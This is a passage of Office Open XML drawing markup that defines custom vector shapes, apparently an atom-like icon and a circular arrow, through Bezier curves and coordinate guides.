                  <a:cubicBezTo>
                    <a:pt x="2573893" y="4388"/>
                    <a:pt x="3159298" y="301825"/>
                    <a:pt x="3523293" y="811132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3830209" y="504216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3830209" y="1597974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736450" y="1597974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079535" y="1254889"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2781093" y="759084"/>
                    <a:pt x="2193496" y="514178"/>
                    <a:pt x="1628358" y="652202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1050236" y="793397"/>
                    <a:pt x="635978" y="1301040"/>
                    <a:pt x="613584" y="1895733"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="612000" y="1895674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612000" y="1985958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1985958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1837407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787" y="1837407"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="49183" y="983705"/>
                    <a:pt x="649445" y="259216"/>
                    <a:pt x="1482678" y="55715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1641057" y="17034"/>
                    <a:pt x="1800644" y="-1063"/>
                    <a:pt x="195824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16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F6F3B5-823E-442B-809C-F7DFF41F2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8038" y="5418963"/>
              <a:ext cx="353455" cy="397548"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1376433 w 2765122"/>
                <a:gd name="connsiteY0" fmla="*/ 2257187 h 3110058"/>
                <a:gd name="connsiteX1" fmla="*/ 1145400 w 2765122"/>
                <a:gd name="connsiteY1" fmla="*/ 2354829 h 3110058"/>
                <a:gd name="connsiteX2" fmla="*/ 1036105 w 2765122"/>
                <a:gd name="connsiteY2" fmla="*/ 2389775 h 3110058"/>
                <a:gd name="connsiteX3" fmla="*/ 1040146 w 2765122"/>
                <a:gd name="connsiteY3" fmla="*/ 2406930 h 3110058"/>
                <a:gd name="connsiteX4" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY4" fmla="*/ 2894301 h 3110058"/>
                <a:gd name="connsiteX5" fmla="*/ 1724974 w 2765122"/>
                <a:gd name="connsiteY5" fmla="*/ 2406930 h 3110058"/>
                <a:gd name="connsiteX6" fmla="*/ 1726723 w 2765122"/>
                <a:gd name="connsiteY6" fmla="*/ 2399874 h 3110058"/>
                <a:gd name="connsiteX7" fmla="*/ 1605728 w 2765122"/>
                <a:gd name="connsiteY7" fmla="*/ 2358846 h 3110058"/>
                <a:gd name="connsiteX8" fmla="*/ 1795887 w 2765122"/>
                <a:gd name="connsiteY8" fmla="*/ 2033026 h 3110058"/>
                <a:gd name="connsiteX9" fmla="*/ 1694075 w 2765122"/>
                <a:gd name="connsiteY9" fmla="*/ 2094586 h 3110058"/>
                <a:gd name="connsiteX10" fmla="*/ 1578650 w 2765122"/>
                <a:gd name="connsiteY10" fmla="*/ 2155153 h 3110058"/>
                <a:gd name="connsiteX11" fmla="*/ 1618821 w 2765122"/>
                <a:gd name="connsiteY11" fmla="*/ 2173994 h 3110058"/>
                <a:gd name="connsiteX12" fmla="*/ 1763952 w 2765122"/>
                <a:gd name="connsiteY12" fmla="*/ 2229138 h 3110058"/>
                <a:gd name="connsiteX13" fmla="*/ 1791432 w 2765122"/>
                <a:gd name="connsiteY13" fmla="*/ 2076334 h 3110058"/>
                <a:gd name="connsiteX14" fmla="*/ 969005 w 2765122"/>
                <a:gd name="connsiteY14" fmla="*/ 2030800 h 3110058"/>
                <a:gd name="connsiteX15" fmla="*/ 973688 w 2765122"/>
                <a:gd name="connsiteY15" fmla="*/ 2076334 h 3110058"/>
                <a:gd name="connsiteX16" fmla="*/ 997942 w 2765122"/>
                <a:gd name="connsiteY16" fmla="*/ 2219324 h 3110058"/>
                <a:gd name="connsiteX17" fmla="*/ 1135534 w 2765122"/>
                <a:gd name="connsiteY17" fmla="*/ 2169774 h 3110058"/>
                <a:gd name="connsiteX18" fmla="*/ 1176026 w 2765122"/>
                <a:gd name="connsiteY18" fmla="*/ 2151638 h 3110058"/>
                <a:gd name="connsiteX19" fmla="*/ 1061678 w 2765122"/>
                <a:gd name="connsiteY19" fmla="*/ 2089068 h 3110058"/>
                <a:gd name="connsiteX20" fmla="*/ 2270995 w 2765122"/>
                <a:gd name="connsiteY20" fmla="*/ 1682607 h 3110058"/>
                <a:gd name="connsiteX21" fmla="*/ 2193789 w 2765122"/>
                <a:gd name="connsiteY21" fmla="*/ 1749541 h 3110058"/>
                <a:gd name="connsiteX22" fmla="*/ 2080535 w 2765122"/>
                <a:gd name="connsiteY22" fmla="*/ 1839120 h 3110058"/>
                <a:gd name="connsiteX23" fmla="*/ 1988274 w 2765122"/>
                <a:gd name="connsiteY23" fmla="*/ 1905861 h 3110058"/>
                <a:gd name="connsiteX24" fmla="*/ 1956628 w 2765122"/>
                <a:gd name="connsiteY24" fmla="*/ 2160317 h 3110058"/>
                <a:gd name="connsiteX25" fmla="*/ 1929983 w 2765122"/>
                <a:gd name="connsiteY25" fmla="*/ 2282840 h 3110058"/>
                <a:gd name="connsiteX26" fmla="*/ 2032699 w 2765122"/>
                <a:gd name="connsiteY26" fmla="*/ 2311732 h 3110058"/>
                <a:gd name="connsiteX27" fmla="*/ 2530541 w 2765122"/>
                <a:gd name="connsiteY27" fmla="*/ 2244806 h 3110058"/>
                <a:gd name="connsiteX28" fmla="*/ 2289139 w 2765122"/>
                <a:gd name="connsiteY28" fmla="*/ 1700285 h 3110058"/>
                <a:gd name="connsiteX29" fmla="*/ 491768 w 2765122"/>
                <a:gd name="connsiteY29" fmla="*/ 1666932 h 3110058"/>
                <a:gd name="connsiteX30" fmla="*/ 473585 w 2765122"/>
                <a:gd name="connsiteY30" fmla="*/ 1684439 h 3110058"/>
                <a:gd name="connsiteX31" fmla="*/ 222717 w 2765122"/>
                <a:gd name="connsiteY31" fmla="*/ 2224664 h 3110058"/>
                <a:gd name="connsiteX32" fmla="*/ 719315 w 2765122"/>
                <a:gd name="connsiteY32" fmla="*/ 2300269 h 3110058"/>
                <a:gd name="connsiteX33" fmla="*/ 831176 w 2765122"/>
                <a:gd name="connsiteY33" fmla="*/ 2270901 h 3110058"/>
                <a:gd name="connsiteX34" fmla="*/ 808495 w 2765122"/>
                <a:gd name="connsiteY34" fmla="*/ 2160317 h 3110058"/>
                <a:gd name="connsiteX35" fmla="*/ 776012 w 2765122"/>
                <a:gd name="connsiteY35" fmla="*/ 1899134 h 3110058"/>
                <a:gd name="connsiteX36" fmla="*/ 679735 w 2765122"/>
                <a:gd name="connsiteY36" fmla="*/ 1826895 h 3110058"/>
                <a:gd name="connsiteX37" fmla="*/ 502637 w 2765122"/>
                <a:gd name="connsiteY37" fmla="*/ 1677612 h 3110058"/>
                <a:gd name="connsiteX38" fmla="*/ 2001099 w 2765122"/>
                <a:gd name="connsiteY38" fmla="*/ 1443878 h 3110058"/>
                <a:gd name="connsiteX39" fmla="*/ 2005588 w 2765122"/>
                <a:gd name="connsiteY39" fmla="*/ 1555029 h 3110058"/>
                <a:gd name="connsiteX40" fmla="*/ 2000712 w 2765122"/>
                <a:gd name="connsiteY40" fmla="*/ 1675767 h 3110058"/>
                <a:gd name="connsiteX41" fmla="*/ 2038461 w 2765122"/>
                <a:gd name="connsiteY41" fmla="*/ 1648469 h 3110058"/>
                <a:gd name="connsiteX42" fmla="*/ 2130505 w 2765122"/>
                <a:gd name="connsiteY42" fmla="*/ 1573751 h 3110058"/>
                <a:gd name="connsiteX43" fmla="*/ 2143759 w 2765122"/>
                <a:gd name="connsiteY43" fmla="*/ 1562074 h 3110058"/>
                <a:gd name="connsiteX44" fmla="*/ 2039991 w 2765122"/>
                <a:gd name="connsiteY44" fmla="*/ 1473050 h 3110058"/>
                <a:gd name="connsiteX45" fmla="*/ 764411 w 2765122"/>
                <a:gd name="connsiteY45" fmla="*/ 1434288 h 3110058"/>
                <a:gd name="connsiteX46" fmla="*/ 726661 w 2765122"/>
                <a:gd name="connsiteY46" fmla="*/ 1461587 h 3110058"/>
                <a:gd name="connsiteX47" fmla="*/ 634617 w 2765122"/>
                <a:gd name="connsiteY47" fmla="*/ 1536305 h 3110058"/>
                <a:gd name="connsiteX48" fmla="*/ 621360 w 2765122"/>
                <a:gd name="connsiteY48" fmla="*/ 1547985 h 3110058"/>
                <a:gd name="connsiteX49" fmla="*/ 725129 w 2765122"/>
                <a:gd name="connsiteY49" fmla="*/ 1637009 h 3110058"/>
                <a:gd name="connsiteX50" fmla="*/ 764024 w 2765122"/>
                <a:gd name="connsiteY50" fmla="*/ 1666183 h 3110058"/>
                <a:gd name="connsiteX51" fmla="*/ 759534 w 2765122"/>
                <a:gd name="connsiteY51" fmla="*/ 1555029 h 3110058"/>
                <a:gd name="connsiteX52" fmla="*/ 1386966 w 2765122"/>
                <a:gd name="connsiteY52" fmla="*/ 1049980 h 3110058"/>
                <a:gd name="connsiteX53" fmla="*/ 1160689 w 2765122"/>
                <a:gd name="connsiteY53" fmla="*/ 1170734 h 3110058"/>
                <a:gd name="connsiteX54" fmla="*/ 947211 w 2765122"/>
                <a:gd name="connsiteY54" fmla="*/ 1303680 h 3110058"/>
                <a:gd name="connsiteX55" fmla="*/ 938816 w 2765122"/>
                <a:gd name="connsiteY55" fmla="*/ 1555028 h 3110058"/>
                <a:gd name="connsiteX56" fmla="*/ 947046 w 2765122"/>
                <a:gd name="connsiteY56" fmla="*/ 1801432 h 3110058"/>
                <a:gd name="connsiteX57" fmla="*/ 1154015 w 2765122"/>
                <a:gd name="connsiteY57" fmla="*/ 1935392 h 3110058"/>
                <a:gd name="connsiteX58" fmla="*/ 1378151 w 2765122"/>
                <a:gd name="connsiteY58" fmla="*/ 2060078 h 3110058"/>
                <a:gd name="connsiteX59" fmla="*/ 1604433 w 2765122"/>
                <a:gd name="connsiteY59" fmla="*/ 1939321 h 3110058"/>
                <a:gd name="connsiteX60" fmla="*/ 1817909 w 2765122"/>
                <a:gd name="connsiteY60" fmla="*/ 1806377 h 3110058"/>
                <a:gd name="connsiteX61" fmla="*/ 1826304 w 2765122"/>
                <a:gd name="connsiteY61" fmla="*/ 1555028 h 3110058"/>
                <a:gd name="connsiteX62" fmla="*/ 1818074 w 2765122"/>
                <a:gd name="connsiteY62" fmla="*/ 1308628 h 3110058"/>
                <a:gd name="connsiteX63" fmla="*/ 1611105 w 2765122"/>
                <a:gd name="connsiteY63" fmla="*/ 1174667 h 3110058"/>
                <a:gd name="connsiteX64" fmla="*/ 1767179 w 2765122"/>
                <a:gd name="connsiteY64" fmla="*/ 890733 h 3110058"/>
                <a:gd name="connsiteX65" fmla="*/ 1629589 w 2765122"/>
                <a:gd name="connsiteY65" fmla="*/ 940281 h 3110058"/>
                <a:gd name="connsiteX66" fmla="*/ 1589093 w 2765122"/>
                <a:gd name="connsiteY66" fmla="*/ 958419 h 3110058"/>
                <a:gd name="connsiteX67" fmla="*/ 1703444 w 2765122"/>
                <a:gd name="connsiteY67" fmla="*/ 1020991 h 3110058"/>
                <a:gd name="connsiteX68" fmla="*/ 1796116 w 2765122"/>
                <a:gd name="connsiteY68" fmla="*/ 1079257 h 3110058"/>
                <a:gd name="connsiteX69" fmla="*/ 1791432 w 2765122"/>
                <a:gd name="connsiteY69" fmla="*/ 1033723 h 3110058"/>
                <a:gd name="connsiteX70" fmla="*/ 1001168 w 2765122"/>
                <a:gd name="connsiteY70" fmla="*/ 880921 h 3110058"/>
                <a:gd name="connsiteX71" fmla="*/ 973688 w 2765122"/>
                <a:gd name="connsiteY71" fmla="*/ 1033723 h 3110058"/>
                <a:gd name="connsiteX72" fmla="*/ 969233 w 2765122"/>
                <a:gd name="connsiteY72" fmla="*/ 1077033 h 3110058"/>
                <a:gd name="connsiteX73" fmla="*/ 1071048 w 2765122"/>
                <a:gd name="connsiteY73" fmla="*/ 1015472 h 3110058"/>
                <a:gd name="connsiteX74" fmla="*/ 1186470 w 2765122"/>
                <a:gd name="connsiteY74" fmla="*/ 954907 h 3110058"/>
                <a:gd name="connsiteX75" fmla="*/ 1146299 w 2765122"/>
                <a:gd name="connsiteY75" fmla="*/ 936065 h 3110058"/>
                <a:gd name="connsiteX76" fmla="*/ 2296662 w 2765122"/>
                <a:gd name="connsiteY76" fmla="*/ 783036 h 3110058"/>
                <a:gd name="connsiteX77" fmla="*/ 2045808 w 2765122"/>
                <a:gd name="connsiteY77" fmla="*/ 809787 h 3110058"/>
                <a:gd name="connsiteX78" fmla="*/ 1933945 w 2765122"/>
                <a:gd name="connsiteY78" fmla="*/ 839155 h 3110058"/>
                <a:gd name="connsiteX79" fmla="*/ 1956628 w 2765122"/>
                <a:gd name="connsiteY79" fmla="*/ 949742 h 3110058"/>
                <a:gd name="connsiteX80" fmla="*/ 1989111 w 2765122"/>
                <a:gd name="connsiteY80" fmla="*/ 1210925 h 3110058"/>
                <a:gd name="connsiteX81" fmla="*/ 2085387 w 2765122"/>
                <a:gd name="connsiteY81" fmla="*/ 1283163 h 3110058"/>
                <a:gd name="connsiteX82" fmla="*/ 2262485 w 2765122"/>
                <a:gd name="connsiteY82" fmla="*/ 1432446 h 3110058"/>
                <a:gd name="connsiteX83" fmla="*/ 2273353 w 2765122"/>
                <a:gd name="connsiteY83" fmla="*/ 1443125 h 3110058"/>
                <a:gd name="connsiteX84" fmla="*/ 2291537 w 2765122"/>
                <a:gd name="connsiteY84" fmla="*/ 1425616 h 3110058"/>
                <a:gd name="connsiteX85" fmla="*/ 2542406 w 2765122"/>
                <a:gd name="connsiteY85" fmla="*/ 885391 h 3110058"/>
                <a:gd name="connsiteX86" fmla="*/ 2296662 w 2765122"/>
                <a:gd name="connsiteY86" fmla="*/ 783036 h 3110058"/>
                <a:gd name="connsiteX87" fmla="*/ 482072 w 2765122"/>
                <a:gd name="connsiteY87" fmla="*/ 767202 h 3110058"/>
                <a:gd name="connsiteX88" fmla="*/ 234579 w 2765122"/>
                <a:gd name="connsiteY88" fmla="*/ 865253 h 3110058"/>
                <a:gd name="connsiteX89" fmla="*/ 475981 w 2765122"/>
                <a:gd name="connsiteY89" fmla="*/ 1409774 h 3110058"/>
                <a:gd name="connsiteX90" fmla="*/ 494126 w 2765122"/>
                <a:gd name="connsiteY90" fmla="*/ 1427453 h 3110058"/>
                <a:gd name="connsiteX91" fmla="*/ 571333 w 2765122"/>
                <a:gd name="connsiteY91" fmla="*/ 1360517 h 3110058"/>
                <a:gd name="connsiteX92" fmla="*/ 684587 w 2765122"/>
                <a:gd name="connsiteY92" fmla="*/ 1270938 h 3110058"/>
                <a:gd name="connsiteX93" fmla="*/ 776848 w 2765122"/>
                <a:gd name="connsiteY93" fmla="*/ 1204197 h 3110058"/>
                <a:gd name="connsiteX94" fmla="*/ 808495 w 2765122"/>
                <a:gd name="connsiteY94" fmla="*/ 949742 h 3110058"/>
                <a:gd name="connsiteX95" fmla="*/ 835139 w 2765122"/>
                <a:gd name="connsiteY95" fmla="*/ 827220 h 3110058"/>
                <a:gd name="connsiteX96" fmla="*/ 732420 w 2765122"/>
                <a:gd name="connsiteY96" fmla="*/ 798327 h 3110058"/>
                <a:gd name="connsiteX97" fmla="*/ 482072 w 2765122"/>
                <a:gd name="connsiteY97" fmla="*/ 767202 h 3110058"/>
                <a:gd name="connsiteX98" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY98" fmla="*/ 215755 h 3110058"/>
                <a:gd name="connsiteX99" fmla="*/ 1040146 w 2765122"/>
                <a:gd name="connsiteY99" fmla="*/ 703126 h 3110058"/>
                <a:gd name="connsiteX100" fmla="*/ 1038397 w 2765122"/>
                <a:gd name="connsiteY100" fmla="*/ 710184 h 3110058"/>
                <a:gd name="connsiteX101" fmla="*/ 1159394 w 2765122"/>
                <a:gd name="connsiteY101" fmla="*/ 751212 h 3110058"/>
                <a:gd name="connsiteX102" fmla="*/ 1388689 w 2765122"/>
                <a:gd name="connsiteY102" fmla="*/ 852872 h 3110058"/>
                <a:gd name="connsiteX103" fmla="*/ 1619722 w 2765122"/>
                <a:gd name="connsiteY103" fmla="*/ 755229 h 3110058"/>
                <a:gd name="connsiteX104" fmla="*/ 1729016 w 2765122"/>
                <a:gd name="connsiteY104" fmla="*/ 720284 h 3110058"/>
                <a:gd name="connsiteX105" fmla="*/ 1724974 w 2765122"/>
                <a:gd name="connsiteY105" fmla="*/ 703126 h 3110058"/>
                <a:gd name="connsiteX106" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY106" fmla="*/ 215755 h 3110058"/>
                <a:gd name="connsiteX107" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY107" fmla="*/ 0 h 3110058"/>
                <a:gd name="connsiteX108" fmla="*/ 1863319 w 2765122"/>
                <a:gd name="connsiteY108" fmla="*/ 565886 h 3110058"/>
                <a:gd name="connsiteX109" fmla="*/ 1892754 w 2765122"/>
                <a:gd name="connsiteY109" fmla="*/ 669221 h 3110058"/>
                <a:gd name="connsiteX110" fmla="*/ 1998805 w 2765122"/>
                <a:gd name="connsiteY110" fmla="*/ 644109 h 3110058"/>
                <a:gd name="connsiteX111" fmla="*/ 2729256 w 2765122"/>
                <a:gd name="connsiteY111" fmla="*/ 777515 h 3110058"/>
                <a:gd name="connsiteX112" fmla="*/ 2479563 w 2765122"/>
                <a:gd name="connsiteY112" fmla="*/ 1476806 h 3110058"/>
                <a:gd name="connsiteX113" fmla="*/ 2396868 w 2765122"/>
                <a:gd name="connsiteY113" fmla="*/ 1564493 h 3110058"/>
                <a:gd name="connsiteX114" fmla="*/ 2415853 w 2765122"/>
                <a:gd name="connsiteY114" fmla="*/ 1583149 h 3110058"/>
                <a:gd name="connsiteX115" fmla="*/ 2715481 w 2765122"/>
                <a:gd name="connsiteY115" fmla="*/ 2355928 h 3110058"/>
                <a:gd name="connsiteX116" fmla="*/ 1982813 w 2765122"/>
                <a:gd name="connsiteY116" fmla="*/ 2476565 h 3110058"/>
                <a:gd name="connsiteX117" fmla="*/ 1890625 w 2765122"/>
                <a:gd name="connsiteY117" fmla="*/ 2453030 h 3110058"/>
                <a:gd name="connsiteX118" fmla="*/ 1863319 w 2765122"/>
                <a:gd name="connsiteY118" fmla="*/ 2544172 h 3110058"/>
                <a:gd name="connsiteX119" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY119" fmla="*/ 3110058 h 3110058"/>
                <a:gd name="connsiteX120" fmla="*/ 901803 w 2765122"/>
                <a:gd name="connsiteY120" fmla="*/ 2544172 h 3110058"/>
                <a:gd name="connsiteX121" fmla="*/ 872368 w 2765122"/>
                <a:gd name="connsiteY121" fmla="*/ 2440837 h 3110058"/>
                <a:gd name="connsiteX122" fmla="*/ 766317 w 2765122"/>
                <a:gd name="connsiteY122" fmla="*/ 2465949 h 3110058"/>
                <a:gd name="connsiteX123" fmla="*/ 35866 w 2765122"/>
                <a:gd name="connsiteY123" fmla="*/ 2332544 h 3110058"/>
                <a:gd name="connsiteX124" fmla="*/ 285559 w 2765122"/>
                <a:gd name="connsiteY124" fmla="*/ 1633252 h 3110058"/>
                <a:gd name="connsiteX125" fmla="*/ 368254 w 2765122"/>
                <a:gd name="connsiteY125" fmla="*/ 1545565 h 3110058"/>
                <a:gd name="connsiteX126" fmla="*/ 349269 w 2765122"/>
                <a:gd name="connsiteY126" fmla="*/ 1526910 h 3110058"/>
                <a:gd name="connsiteX127" fmla="*/ 49641 w 2765122"/>
                <a:gd name="connsiteY127" fmla="*/ 754130 h 3110058"/>
                <a:gd name="connsiteX128" fmla="*/ 782309 w 2765122"/>
                <a:gd name="connsiteY128" fmla="*/ 633493 h 3110058"/>
                <a:gd name="connsiteX129" fmla="*/ 874497 w 2765122"/>
                <a:gd name="connsiteY129" fmla="*/ 657029 h 3110058"/>
                <a:gd name="connsiteX130" fmla="*/ 901803 w 2765122"/>
                <a:gd name="connsiteY130" fmla="*/ 565886 h 3110058"/>
                <a:gd name="connsiteX131" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY131" fmla="*/ 0 h 31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765122" h="3110058">
                  <a:moveTo>
                    <a:pt x="1376433" y="2257187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1145400" y="2354829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036105" y="2389775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1040146" y="2406930"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1121535" y="2704580"/>
                    <a:pt x="1244707" y="2894301"/>
                    <a:pt x="1382560" y="2894301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1520414" y="2894301"/>
                    <a:pt x="1643585" y="2704580"/>
                    <a:pt x="1724974" y="2406930"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1726723" y="2399874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1605728" y="2358846"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1795887" y="2033026"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1694075" y="2094586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578650" y="2155153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618821" y="2173994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1763952" y="2229138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791432" y="2076334"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="969005" y="2030800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973688" y="2076334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="997942" y="2219324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135534" y="2169774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176026" y="2151638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061678" y="2089068"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2270995" y="1682607"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2193789" y="1749541"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2157450" y="1779622"/>
                    <a:pt x="2119670" y="1809519"/>
                    <a:pt x="2080535" y="1839120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1988274" y="1905861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956628" y="2160317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929983" y="2282840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032699" y="2311732"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2281801" y="2367725"/>
                    <a:pt x="2467430" y="2349840"/>
                    <a:pt x="2530541" y="2244806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2601541" y="2126643"/>
                    <a:pt x="2502356" y="1923350"/>
                    <a:pt x="2289139" y="1700285"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="491768" y="1666932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="473585" y="1684439"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="256508" y="1903749"/>
                    <a:pt x="153790" y="2105280"/>
                    <a:pt x="222717" y="2224664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283985" y="2330784"/>
                    <a:pt x="469273" y="2351906"/>
                    <a:pt x="719315" y="2300269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="831176" y="2270901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808495" y="2160317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776012" y="1899134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679735" y="1826895"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="616990" y="1777691"/>
                    <a:pt x="557836" y="1727770"/>
                    <a:pt x="502637" y="1677612"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2001099" y="1443878"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2005588" y="1555029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000712" y="1675767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038461" y="1648469"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2070345" y="1623579"/>
                    <a:pt x="2101053" y="1598643"/>
                    <a:pt x="2130505" y="1573751"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2143759" y="1562074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039991" y="1473050"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="764411" y="1434288"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726661" y="1461587"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="694778" y="1486477"/>
                    <a:pt x="664070" y="1511412"/>
                    <a:pt x="634617" y="1536305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="621360" y="1547985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725129" y="1637009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764024" y="1666183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759534" y="1555029"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1386966" y="1049980"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1160689" y="1170734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947211" y="1303680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938816" y="1555028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947046" y="1801432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154015" y="1935392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378151" y="2060078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604433" y="1939321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817909" y="1806377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826304" y="1555028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818074" y="1308628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611105" y="1174667"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1767179" y="890733"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1629589" y="940281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589093" y="958419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703444" y="1020991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796116" y="1079257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791432" y="1033723"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1001168" y="880921"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973688" y="1033723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969233" y="1077033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071048" y="1015472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186470" y="954907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146299" y="936065"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2296662" y="783036"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2224233" y="781291"/>
                    <a:pt x="2139574" y="790423"/>
                    <a:pt x="2045808" y="809787"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1933945" y="839155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956628" y="949742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989111" y="1210925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085387" y="1283163"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2148132" y="1332368"/>
                    <a:pt x="2207286" y="1382289"/>
                    <a:pt x="2262485" y="1432446"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2273353" y="1443125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2291537" y="1425616"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2508615" y="1206306"/>
                    <a:pt x="2611333" y="1004776"/>
                    <a:pt x="2542406" y="885391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2504113" y="819067"/>
                    <a:pt x="2417375" y="785944"/>
                    <a:pt x="2296662" y="783036"/>
